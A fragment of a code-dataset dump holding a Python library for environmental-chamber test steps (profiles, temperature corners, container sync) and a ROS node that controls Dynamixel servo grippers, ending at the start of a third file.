{0}\".format(profile_table[profile_type].__name__))\n log.info(\"Container Sync Groups = {0}\".format(aplib.get_container_sync_groups()))\n log.info(\"Chamber Target Sync Group = {!r}\".format(sync_group))\n log.info(\"Container = {0}\".format(aplib.get_my_container_key()))\n\n # All containers need to sync up\n log.debug(\"Chamber Init sync 1...\")\n sync_chamber_group(sync_group)\n\n # Init the Chamber\n log.debug(\"Performing ChamberInterface.init...\")\n if not chamber_handler:\n log.debug(\"The global chamber_handler is new.\")\n else:\n log.debug(\"The global chamber_handler will be reset.\")\n chamber_handler = None\n chamber_handler = ChamberInterface.init(profile=profile_table[profile_type],\n connection=aplib.conn.Chamber,\n sync_group=sync_group,\n logger=log,\n save_to_chart='entsw_thermal.svg',\n first_init=first_init,\n fi_action=fi_action)\n log.debug(\"Chamber Init sync 2...\")\n sync_chamber_group(sync_group)\n\n log.debug(\"Handler Profile\")\n for k, v in chamber_handler.profiles.items():\n log.debug(\" {0:<20}: {1}\".format(k, v))\n\n log.debug(\"STEP: Chamber Init PASSED.\")\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_start():\n \"\"\"\n Chamber start - config chamber and start to run\n :return:\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Start.\")\n log.debug(\"chamber_handler = {0}\".format(chamber_handler))\n ChamberInterface.start(chamber_handler)\n log.debug(\"STEP: Chamber Start PASSED\")\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_final():\n \"\"\"\n Go to room temperature, and stop chamber\n Only allow the last container do chamber finalization\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Final.\")\n ChamberInterface.stop(chamber_handler, AMBIENT, DRY, -10)\n log.debug(\"STEP: Chamber Final {0}\".format(aplib.apdicts.stepdict['current_status']))\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_ramp(action=AMBIENT):\n \"\"\"\n Chamber temperature ramp up/down to the temperature defined in profile\n :param action\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n msg = \"STEP: Chamber Ramp --> {0}.\".format(action)\n log.debug(msg)\n log.debug(\"-\" * len(msg))\n log.debug(\"Global Corners = {0}\".format(get_global_corners()))\n log.debug(\"Global Profile\")\n for k, v in get_global_profile().items():\n log.debug(\" {0:<20}: {1}\".format(k, v))\n log.debug(\"Handler Profile\")\n for k, v in chamber_handler.profiles.items():\n log.debug(\" {0:<20}: {1}\".format(k, v))\n\n global last_action\n last_action = action\n ChamberInterface.ramp(chamber_handler, action=action)\n log.debug(\"STEP: Chamber Ramp PASSED\")\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_start_monitor():\n \"\"\"\n Start to monitor temperature in chamber during test.\n If set MONITOR_IN_TEST as True, this step will be bypassed.\n :return:\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Start Monitor.\")\n log.debug(\"chamber_handler = {0}\".format(chamber_handler))\n ChamberInterface.monitor_start(chamber_handler, monitor_in_test=MONITOR_IN_TEST)\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef step__chamber_stop_monitor():\n \"\"\"\n Stop to monitor temperature in chamber after test is done.\n If set MONITOR_IN_TEST as True, this step will be bypassed.\n :return:\n \"\"\"\n log.debug(r\"//\" + \"-\" * 50)\n log.debug(\"STEP: Chamber Stop Monitor.\")\n ChamberInterface.monitor_stop(monitor_in_test=MONITOR_IN_TEST)\n log.debug(r\"\\\\\" + \"-\" * 50)\n return aplib.PASS\n\n\ndef prestep__chamber_staging(area):\n \"\"\" Chamber Staging\n Run by Supercontainer\n Operator selects which UUT slots to run for the chamber.\n :param (str) area: Test Area\n :return:\n \"\"\"\n info = aplib.get_pre_sequence_info()\n active_chamber_slots = '0'\n max_chamber_slots = len(info.containers)\n log.debug(\"MAX Chamber SLots = {0}\".format(max_chamber_slots))\n ans_good = False\n while not ans_good:\n ans = aplib.ask_question(\"Enter sequential UUT slots for chamber testing [Default = 1-{0}]:\\n\"\n \" Ex1. 1-10,12,15\\n\"\n \" Ex2. 2,4,6,8\\n\"\n \" Ex3. 2-11\\n\".format(max_chamber_slots))\n ans = '1-{0}'.format(max_chamber_slots) if ans == '' else ans\n ans_good = True if re.match(\"(^[0-9]+[0-9,\\-]*$)\", ans) else False\n if ans.upper() == 'ABORT':\n raise apexceptions.AbortException(\"Operator aborted chamber staging of UUT slots.\")\n\n active_chamber_slots = common_utils.expand_comma_dash_num_list(ans)\n if max(active_chamber_slots) > max_chamber_slots:\n log.warning(\"Chamber UUT slot selection exceeds maximum available; please re-enter.\")\n ans_good = False\n\n log.debug(\"Active Chamber SLots accepted: {0}\".format(active_chamber_slots))\n ACTIVECS_KEY, MAXCS_KEY = get_chamber_slots_keys()\n aplib.cache_data(ACTIVECS_KEY, active_chamber_slots)\n aplib.cache_data(MAXCS_KEY, str(max_chamber_slots))\n\n # Reset globals\n reset_globals()\n\n return aplib.PASS\n\n\ndef prestep__set_chamber_attributes():\n log.debug(\"Chamber attribute processing...\")\n set_global_corners()\n set_global_profile()\n return aplib.PASS\n\n\ndef prestep__chamber_post_staging():\n ACTIVECS_KEY, _ = get_chamber_slots_keys()\n active_chamber_slots = aplib.get_cached_data(ACTIVECS_KEY)\n log.debug(\"Active chamber slots: {0}\".format(active_chamber_slots))\n return aplib.PASS\n\n\n# ======================================================================================================================\n# Support Functions\n# ======================================================================================================================\ndef __load_chamber_profile(obj, chamber_profile):\n \"\"\" (INTERNAL) Driver to load a profile to the chamber handler.\n DO NOT call this directly, use the chamber_xxx_profile() functions.\n :param obj: chamber handler object\n :param chamber_profile:\n :return:\n \"\"\"\n log.info(\"Installing chamber profile to handler...\")\n for corner in chamber_profile.keys():\n if corner in ALLOWED_CORNERS:\n ramp = chamber_profile[corner]['ramp']\n soak = chamber_profile[corner]['soak']\n test = chamber_profile[corner]['test']\n obj.set_profile_ramp(corner, temperature=ramp.temperature, rate=ramp.rate, margin=ramp.margin, max_humidity=ramp.max_humidity)\n obj.set_profile_soak(corner, margin=soak.margin, duration=soak.duration, max_humidity=soak.max_humidity)\n obj.set_profile_test(corner, margin=test.margin, max_humidity=test.max_humidity)\n log.debug(\"Corner = {0}\".format(corner))\n log.debug(\" Ramp = {0}\".format(ramp))\n log.debug(\" Soak = {0}\".format(soak))\n else:\n log.warning(\"An unknown corner ({0}) was specified in the profile. It will NOT be loaded to the handler.\".format(corner))\n return True\n\n\ndef show_container_info():\n container_name = aplib.get_container_name()\n aplib.get_container_status(container_name)\n container_key = aplib.get_my_container_key()\n station_key = '|'.join(container_key.split('|')[:-1])\n log.debug(\"Container = {0}\".format(container_name))\n log.debug(\"Station = {0}\".format(station_key))\n log.debug(\"Cfg = {0}\".format(aplib.apdicts.configuration_data))\n return\n\n\ndef sync_chamber_group(group_name):\n # All containers need to sync up\n try:\n aplib.sync_group(group_name=group_name, timeout=300)\n except apexceptions.TimeoutException as e:\n log.error(e.message)\n msg = \"Container could not sync up chamber group.\"\n log.error(msg)\n return False, msg + e.message\n return True, None\n\n\ndef get_chamber_sync_group():\n \"\"\" Get Chamber Sync Group\n Tiered get (first occurance)\n 1. 'ChamberSync' in the container's list of sync groups, OR\n 2. \"CHAMBER_SYNC_GROUP\" key in the configuration_data for the station, OR\n 3. Use the default: CHAMBER_SYNC_GROUP.\n :return:\n \"\"\"\n global CHAMBER_SYNC_GROUP\n log.debug(\"Determine sync group for chamber...\")\n\n for k in aplib.get_container_sync_groups():\n if 'ChamberSync'.upper() in k.upper():\n CHAMBER_SYNC_GROUP = k\n log.debug(\"Using syncgroup name from existing container sync groups.\")\n break\n else:\n csg = aplib.apdicts.configuration_data.get('CHAMBER_SYNC_GROUP', None).upper()\n if csg:\n log.debug(\"Using syncgroup name from cfg data.\")\n CHAMBER_SYNC_GROUP = csg\n else:\n log.debug(\"Using default syncgroup name.\")\n\n log.debug(\"Calculated Sync Group Name = {0}\".format(CHAMBER_SYNC_GROUP))\n log.debug(\"The CHAMBER_SYNC_GROUP is now set.\")\n return CHAMBER_SYNC_GROUP\n\n\ndef chamber_product_profile(obj):\n \"\"\" Product Chamber Profile\n Pull in the profile from the cached data global space.\n It will be referenced by 'chamber_profile_' + station key\n The global profile MUST have been resolved in the PRE-SEQ after loading the product definitions\n for each UUT in the chamber.\n See the DEFAULT_PROFILES for an example of the required format.\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading custom chamber profile...\")\n chamber_profile = collections.OrderedDict(get_global_profile())\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_default_commercial_profile(obj):\n \"\"\" Default Commercial Chamber Profile\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading default commercial chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['commercial'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_default_commercial_yinhe_profile(obj):\n \"\"\" Default Commercial Chamber Profile\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading default commercial_yinhe chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['commercial_yinhe'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_default_industrial_profile(obj):\n \"\"\" Default Industrial Chamber Profile\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading default industrial chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['industrial'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef chamber_quick_simulation_profile(obj):\n \"\"\" Quick Simulation Chamber Profile\n Note: *** NOT FOR PRODUCTION ***\n Use this for unittest chamber simulation.\n :param obj: Chamber handler object\n :return:\n \"\"\"\n log.info(\"Loading quick simulation chamber profile...\")\n chamber_profile = collections.OrderedDict(DEFAULT_PROFILES['quicksim'])\n return __load_chamber_profile(obj, chamber_profile)\n\n\ndef reset_globals():\n \"\"\" Reset Globals\n Used by Supercontainer in SC-PreSeq\n \"\"\"\n log.debug(\"Chamber globals: reset...\")\n container = aplib.get_my_container_key()\n S_KEY = '_'.join(container.split('|')[:-1])\n cp_key = 'chamber_profile_' + S_KEY\n cc_key = 'chamber_corners_' + S_KEY\n aplib.cache_data(cp_key, None)\n aplib.cache_data(cc_key, None)\n log.debug(\"Chamber globals reset done!\")\n return\n\n\ndef set_global_profile(forced_profile=None):\n \"\"\" Set Global Chamber Profile\n Used by the UUT Container PRE-SEQ.\n This sets the profile to be used by ALL UUTs in the chamber via a global data cache.\n IMPORTANT: Global cache key is the station path (i.e. chamber).\n Differing product families are allowed to run but their profile selections MUST match; if not then it will abort.\n :param (list) forced_profile:\n :return:\n \"\"\"\n\n log.debug(\"Global Profile: set...\")\n container = aplib.get_my_container_key()\n # Source the profile.\n try:\n udd = aplib.apdicts.userdict.get('udd')\n if not udd:\n log.error(\"The UutDescriptor Dict was not available.\")\n log.error(\"Please confirm proper application of the application software!\")\n raise Exception(\"The UutDescriptor Dict was not available.\")\n\n chamber_profile = udd.get('chamber_profile')\n\n if forced_profile:\n profile = collections.OrderedDict(forced_profile)\n log.debug(\"Chamber Profile Source: FORCED.\")\n elif chamber_profile:\n profile = collections.OrderedDict(chamber_profile)\n log.debug(\"Chamber Profile Source: UUT DESCRIPTOR.\")\n else:\n log.warning(\"No UutDescriptor chamber_profile, or forced_profile available.\")\n log.warning(\"Check the product definitions and common definition for 'chamber_profile'.\")\n log.warning(\"The default commercial profile will be used.\")\n profile = collections.OrderedDict(DEFAULT_PROFILES['commercial'])\n except (KeyError, AttributeError):\n log.error(\"Chamber profile data is not available or not in correct form.\")\n return False\n\n log.debug('-' * 50)\n log.debug(\"{0} : Chamber Profile = {1}\".format(container, profile))\n\n # Get the current profile definition (possibly set by another container in the same chamber)\n # Global cache key is the station path (i.e. chamber)\n S_KEY = '_'.join(container.split('|')[:-1])\n cp_key = 'chamber_profile_' + S_KEY\n with locking.named_priority_lock('__profile__' + S_KEY):\n try:\n log.debug(\"Chamber profile cache key (set) = {0}\".format(cp_key))\n established_profile = aplib.get_cached_data(cp_key)\n except (KeyError, apexceptions.ApolloException):\n established_profile = None\n\n if not forced_profile:\n # Save the product-specific profile selections for use by SEQ.\n if not established_profile:\n established_profile = profile\n aplib.cache_data(cp_key, established_profile)\n log.debug(\"*** A new chamber profile set has been established. ***\")\n\n # All UUT profile definitions must match. This allows different PIDs in the same chamber BUT requires\n # them to all have the same profile definition.\n if profile != established_profile:\n log.error(\"Chamber profile: REJECTED!\")\n log.error(\"There is a mismatch of chamber_profiles in {0}. This is NOT allowed.\".format(container))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"MISMATCH of chamber profiles in {0}.\".format(container))\n else:\n log.debug(\"Chamber profile: ACCEPTED. {0}\".format(established_profile))\n else:\n aplib.cache_data(cp_key, profile)\n log.debug(\"Chamber profile: FORCED. {0}\".format(profile))\n\n return True\n\n\ndef get_global_profile(container_key=None):\n \"\"\" Get Profile\n This is strictly a read of the global cache; therefore no locking required.\n IMPORTANT: This is done by sequence_definition() so MUST be compatible with Apollo main process.\n Global cache key is the station path (i.e. chamber).\n :return:\n \"\"\"\n log.debug(\"Global Profile: get...\")\n if not container_key:\n log.debug(\"Need to get container key...\")\n container_key = aplib.get_my_container_key()\n S_KEY = '_'.join(container_key.split('|')[:-1])\n cp_key = 'chamber_profile_' + S_KEY\n try:\n log.debug(\"Global profile cache key (get) = {0}\".format(cp_key))\n chamber_profile = aplib.get_cached_data(cp_key)\n except (KeyError, apexceptions.ApolloException):\n log.exception(\"Problem with chamber profile in global cache.\")\n chamber_profile = None\n\n if not chamber_profile:\n log.error(\"Global profile: ABSENT!\")\n log.error(\"Global cache key = {0}\".format(cp_key))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"Chamber profile: ABSENT!\")\n else:\n log.debug(\"Global profile: PRESENT.\")\n return chamber_profile\n\n\ndef set_global_corners(forced_corners=None):\n \"\"\" Set Global ChamberCorners\n Used by the UUT Container PRE-SEQ.\n This sets the corners to be used by ALL UUTs in the chamber via a global data cache.\n IMPORTANT: Global cache key is the station path (i.e. chamber).\n Differing product families are allowed to run but their corner selections MUST match; if not then it will abort.\n\n Example set in product_definition:\n 'chamber_corners': [('NTNV', False), ('HTLV', True), ('HTHV', True), ('LTLV', True)]\n\n Example of globally saved after processing:\n OrderedDict([('NTNV', ('AMBIENT', 'NOMINAL', False)),\n ('HTLV', ('HOT', 'LOW', True)),\n ('HTHV', ('HOT', 'HIGH', True)),\n ('LTLV', ('COLD', 'LOW', True))])\n\n :param (list) forced_corners:\n :return:\n \"\"\"\n log.debug(\"Global Corners: set...\")\n # Check for a product-specific corner definition.\n _lookup = {'HT': HOT, 'LT': COLD, 'NT': AMBIENT, 'HV': 'HIGH', 'LV': 'LOW', 'NV': 'NOMINAL'}\n container = aplib.get_my_container_key()\n\n try:\n udd = aplib.apdicts.userdict.get('udd')\n if not udd:\n log.error(\"The UutDescriptor Dict was not available.\")\n log.error(\"Please confirm proper application of the application software!\")\n raise Exception(\"The UutDescriptor Dict was not available.\")\n\n chamber_corners = udd.get('chamber_corners')\n\n if forced_corners:\n listed_corners = collections.OrderedDict(forced_corners)\n log.debug(\"Chamber Corners Source: FORCED.\")\n elif chamber_corners:\n listed_corners = collections.OrderedDict(chamber_corners)\n log.debug(\"Chamber Corners Source: UUT DESCRIPTOR.\")\n else:\n log.warning(\"No UutDescriptor chamber_corners, or forced_corners available.\")\n log.warning(\"Check the product definitions and common definition for 'chamber_corners'.\")\n log.warning(\"The default '2-Corner' sequence (HTLV, LTHV) will be used.\")\n listed_corners = [('LTHV', True), ('HTLV', True)]\n\n processed_corners = []\n if listed_corners:\n for lc in listed_corners:\n name = lc[0] if isinstance(lc, tuple) else lc\n adt = lc[1] if isinstance(lc, tuple) and len(lc) > 1 else False\n if len(name) == 4:\n temp = _lookup.get(name[:2], AMBIENT)\n volt = _lookup.get(name[2:4], 'NOMINAL')\n elif len(name) == 2:\n temp = _lookup.get(name, AMBIENT)\n volt = 'NOMINAL'\n else:\n temp = AMBIENT\n volt = 'NOMINAL'\n processed_corners.append((name, (temp, volt, adt)))\n corners = collections.OrderedDict(processed_corners) if processed_corners else None\n except (KeyError, AttributeError):\n log.warning(\"Chamber corner data is not available or not in correct form.\")\n return False\n\n log.debug('-' * 20)\n log.debug(\"{0} : Chamber Corners = {1}\".format(container, listed_corners))\n\n # Now check for proper form of corners dict.\n for corner in corners:\n if not isinstance(corners[corner], tuple):\n log.error(\"Product specific corners are not in the proper form.\")\n raise apexceptions.AbortException\n\n # Get the current corner definition (possibly set by another container in the same chamber)\n S_KEY = '_'.join(container.split('|')[:-1])\n cc_key = 'chamber_corners_' + S_KEY\n with locking.named_priority_lock('__corners__' + S_KEY):\n try:\n log.debug(\"Chamber corner cache key (set) = {0}\".format(cc_key))\n established_corners = aplib.get_cached_data(cc_key)\n except (KeyError, apexceptions.ApolloException):\n established_corners = None\n\n if not forced_corners:\n # Save the product-specific corner selections for use by SEQ.\n if not established_corners:\n established_corners = corners\n aplib.cache_data(cc_key, established_corners)\n log.debug(\"*** A new chamber corner set has been established. ***\")\n\n # All UUT corner definitions must match. This allows different PIDs in the same chamber BUT requires them\n # to all have the same corner definition.\n if corners != established_corners:\n log.error(\"Chamber corners: REJECTED!\")\n log.error(\"There is a mismatch of chamber_corners in {0}. This is NOT allowed.\".format(container))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"MISMATCH of chamber corners in {0}.\".format(container))\n else:\n log.debug(\"Chamber corners: ACCEPTED. {0}\".format(established_corners))\n else:\n aplib.cache_data(cc_key, corners)\n log.debug(\"Chamber corners: FORCED. {0}\".format(corners))\n\n return True\n\n\ndef get_global_corners(container_key=None):\n \"\"\" Get Corners\n This is strictly a read of the global cache; therefore no locking required.\n IMPORTANT: This is done by sequence_definition() so MUST be compatible with Apollo main process.\n Global cache key is the station path (i.e. chamber).\n :return:\n \"\"\"\n log.debug(\"Global Corners: get...\")\n if not container_key:\n log.debug(\"Need to get container key...\")\n container_key = aplib.get_my_container_key()\n S_KEY = '_'.join(container_key.split('|')[:-1])\n cc_key = 'chamber_corners_' + S_KEY\n try:\n log.debug(\"Chamber corner cache key (get) = {0}\".format(cc_key))\n corners = aplib.get_cached_data(cc_key)\n except (KeyError, apexceptions.ApolloException) as e:\n log.exception(\"Problem with chamber corners in global cache.\")\n log.exception(e.message)\n corners = None\n\n if not corners:\n log.error(\"Chamber corners: ABSENT!\")\n log.error(\"Global cache key = {0}\".format(cc_key))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"Chamber corners: ABSENT!\")\n else:\n log.debug(\"Chamber corners: PRESENT.\")\n return corners\n\n\ndef set_chamber_slots(max_chamber_slots=None):\n active_chamber_slots_key, max_chamber_slots_key = get_chamber_slots_keys()\n max_slots = str(DEFAULT_MAX_CHAMBER_SLOTS) if not max_chamber_slots else max_chamber_slots\n aplib.cache_data(active_chamber_slots_key, [])\n aplib.cache_data(max_chamber_slots_key, max_slots)\n return True\n\n\ndef get_chamber_slots_keys(container_key=None):\n station = common_utils.get_station_key(container_key)\n active_chamber_slots_key = 'active_chamber_slots_{0}'.format(station)\n max_chamber_slots_key = 'max_chamber_slots_{0}'.format(station)\n return active_chamber_slots_key, max_chamber_slots_key\n","sub_path":"libs/equip_drivers/steps_ess_chamber.py","file_name":"steps_ess_chamber.py","file_ext":"py","file_size_in_byte":30607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"454500713","text":"#!/usr/bin/env python\nimport rospy\nimport math\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\nfrom std_msgs.msg import Float32\nfrom gps_agent_pkg.msg import GripperState\nimport numpy as np\nimport time\n\n# Control table address\nADDR_PRO_BAUD_RATE\t = 8\nADDR_PRO_RETURN_TIME\t = 9\nADDR_PRO_OPERATING_MODE\t = 11\nADDR_PRO_HOMING_OFFSET \t = 20\nADDR_PRO_MAX_POS \t = 48\nADDR_PRO_MIN_POS \t = 52\nADDR_PRO_TORQUE_ENABLE = 64 # Control table address is different in Dynamixel model\nADDR_PRO_PROFILE_VELOCITY = 112\nADDR_PRO_GOAL_POSITION = 116\nADDR_PRO_PRESENT_POSITION = 132\n\n# Data Byte Length\nLEN_PRO_GOAL_POSITION = 4\nLEN_PRO_PRESENT_POSITION = 4\nLEN_PRO_PROFILE_VELOCITY = 4\n\n\n# Protocol version\nPROTOCOL_VERSION = 2.0 # See which protocol version is used in the Dynamixel\n\n# Default setting\nDXL1_ID = 3 # Dynamixel#1 ID : 1\nDXL2_ID = 4 # Dynamixel#2 ID : 2\nBAUDRATE = 1000000 # Dynamixel default baudrate : 57600\nDEVICENAME = '/dev/ttyUSB0' # Check which port is being used on your controller\n # ex) Windows: \"COM1\" Linux: \"/dev/ttyUSB0\" Mac: \"/dev/tty.usbserial-*\"\nBAUD_RATE_SET\t\t \t= 3\t\t\t# 1000000\nOPERATING_MODE\t\t \t= 5 # Current-based Position Control Mode\n#Max Position Limit(48) and Min Position Limit(52) are only used in Position Control Mode with a single turn.\n\n# ** setserial /dev/ttyUSB0 low_latency - if you want more communication speed, write this in terminal https://github.com/ROBOTIS-GIT/DynamixelSDK/issues/80\n\n\nTORQUE_ENABLE = 1 # Value for enabling the torque\nTORQUE_DISABLE = 0 # Value for disabling the torque\n\nDXL_MOVING_STATUS_THRESHOLD = 10 # Dynamixel moving status threshold\n\n\nportHandler = PortHandler(DEVICENAME)\npacketHandler = PacketHandler(PROTOCOL_VERSION)\n\ngroupSyncWrite = GroupSyncWrite(portHandler, packetHandler, ADDR_PRO_GOAL_POSITION, LEN_PRO_GOAL_POSITION)\ngroupSyncWrite_ProfileVel = GroupSyncWrite(portHandler, packetHandler, ADDR_PRO_PROFILE_VELOCITY, LEN_PRO_PROFILE_VELOCITY)\ngroupSyncRead = GroupSyncRead(portHandler, packetHandler, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n\ndef dxl_init():\n # Open port\n if portHandler.openPort():\n print(\"Succeeded to open the port\")\n else:\n print(\"Failed to open the port\")\n quit()\n\n\n # Set port baudrate\n if portHandler.setBaudRate(BAUDRATE):\n print(\"Succeeded to change the baudrate\")\n else:\n print(\"Failed to change the baudrate\")\n quit()\n\n # Enable Dynamixel#1 Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL1_ID, ADDR_PRO_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % DXL1_ID)\n\n # Enable Dynamixel#2 Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL2_ID, ADDR_PRO_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % DXL2_ID)\n\n # Add parameter storage for Dynamixel#1 present position value\n dxl_addparam_result = groupSyncRead.addParam(DXL1_ID)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncRead addparam failed\" % DXL1_ID)\n quit()\n\n # Add parameter storage for Dynamixel#2 present position value\n dxl_addparam_result = groupSyncRead.addParam(DXL2_ID)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncRead addparam failed\" % DXL2_ID)\n quit()\n\n dxl_profile_vel = 50\n param_profile_vel = [DXL_LOBYTE(DXL_LOWORD(dxl_profile_vel)),\n DXL_HIBYTE(DXL_LOWORD(dxl_profile_vel)),\n DXL_LOBYTE(DXL_HIWORD(dxl_profile_vel)),\n DXL_HIBYTE(DXL_HIWORD(dxl_profile_vel))]\n\n dxl_addparam_result = groupSyncWrite_ProfileVel.addParam(DXL1_ID, param_profile_vel)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL1_ID)\n quit()\n\n dxl_addparam_result = groupSyncWrite_ProfileVel.addParam(DXL2_ID, param_profile_vel)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL2_ID)\n quit()\n\n dxl_comm_result = groupSyncWrite_ProfileVel.txPacket()\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n\n # Clear syncwrite parameter storage\n groupSyncWrite_ProfileVel.clearParam()\n\ndef dis2inc(distance):\n if distance > 0.1:\n distance = 0.1\n elif distance < 0:\n distance = 0\n\n distance = distance/2+0.0065\n inc = int(math.degrees(math.asin((distance-0.0175)/0.07))/0.0879)\n\n return inc\n\ndef dxl_poscon(dis):\n # Allocate goal position value into byte array\n goal_pos = dis2inc(dis)\n dxl_goal_position_1 = 2048-goal_pos\n dxl_goal_position_2 = 2048+goal_pos\n param_goal_position_1 = [DXL_LOBYTE(DXL_LOWORD(dxl_goal_position_1)),\n DXL_HIBYTE(DXL_LOWORD(dxl_goal_position_1)),\n DXL_LOBYTE(DXL_HIWORD(dxl_goal_position_1)),\n DXL_HIBYTE(DXL_HIWORD(dxl_goal_position_1))]\n param_goal_position_2 = [DXL_LOBYTE(DXL_LOWORD(dxl_goal_position_2)),\n DXL_HIBYTE(DXL_LOWORD(dxl_goal_position_2)),\n DXL_LOBYTE(DXL_HIWORD(dxl_goal_position_2)),\n DXL_HIBYTE(DXL_HIWORD(dxl_goal_position_2))]\n\n # Add Dynamixel#1 goal position value to the Syncwrite parameter storage\n dxl_addparam_result = groupSyncWrite.addParam(DXL1_ID, param_goal_position_1)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL1_ID)\n quit()\n\n # Add Dynamixel#2 goal position value to the Syncwrite parameter storage\n dxl_addparam_result = groupSyncWrite.addParam(DXL2_ID, param_goal_position_2)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL2_ID)\n quit()\n\n # Syncwrite goal position\n dxl_comm_result = groupSyncWrite.txPacket()\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n\n # Clear syncwrite parameter storage\n groupSyncWrite.clearParam()\n\n while 1:\n # Syncread present position\n dxl_comm_result = groupSyncRead.txRxPacket()\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n\n # Check if groupsyncread data of Dynamixel#1 is available\n dxl_getdata_result = groupSyncRead.isAvailable(DXL1_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n if dxl_getdata_result != True:\n print(\"[ID:%03d] groupSyncRead getdata failed\" % DXL1_ID)\n quit()\n\n # Check if groupsyncread data of Dynamixel#2 is available\n dxl_getdata_result = groupSyncRead.isAvailable(DXL2_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n if dxl_getdata_result != True:\n print(\"[ID:%03d] groupSyncRead getdata failed\" % DXL2_ID)\n quit()\n\n # Get Dynamixel#1 present position value\n dxl1_present_position = groupSyncRead.getData(DXL1_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n\n # Get Dynamixel#2 present position value\n dxl2_present_position = groupSyncRead.getData(DXL2_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n\n print(\"[ID:%03d] GoalPos:%03d PresPos:%03d\\t[ID:%03d] GoalPos:%03d PresPos:%03d\" % (DXL1_ID, dxl_goal_position_1, dxl1_present_position, DXL2_ID, dxl_goal_position_2, dxl2_present_position))\n\n if not ((abs(dxl_goal_position_1- dxl1_present_position) > DXL_MOVING_STATUS_THRESHOLD) and (abs(dxl_goal_position_2 - dxl2_present_position) > DXL_MOVING_STATUS_THRESHOLD)):\n break\n\n return goal_pos\n # # Clear syncread parameter storage\n # groupSyncRead.clearParam()\n\nclass dummy(object):\n def __init__(self):\n dxl_init()\n rospy.init_node('dummy_env', anonymous=True)\n self.pub = rospy.Publisher('state_result_topic', Float32, queue_size=1)\n self.sub_trial = rospy.Subscriber('trial_command_topic', Float32, self.callback_trial)\n self.sub_reset = rospy.Subscriber('reset_command_topic', Float32, self.callback_reset)\n self.dis = 0.1\n dxl_poscon(self.dis)\n\n self.r = rospy.Rate(5)\n\n def callback_trial(self, command):\n self.dis += command.data / 100.0\n state = dxl_poscon(self.dis)\n self.pub.publish(state)\n\n def callback_reset(self, command):\n self.dis = 0.1\n state = dxl_poscon(self.dis)\n self.r.sleep()\n self.pub.publish(state)\n\n def run(self):\n rate = rospy.Rate(50)\n while not rospy.is_shutdown():\n rate.sleep()\n\nif __name__ == '__main__':\n dummy_robot = dummy()\n dummy_robot.run()","sub_path":"mservo_mani/scripts/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":9530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651251014","text":"import ast\nimport inspect\nimport random\nimport string\nimport traceback\nimport typing\nfrom textwrap import 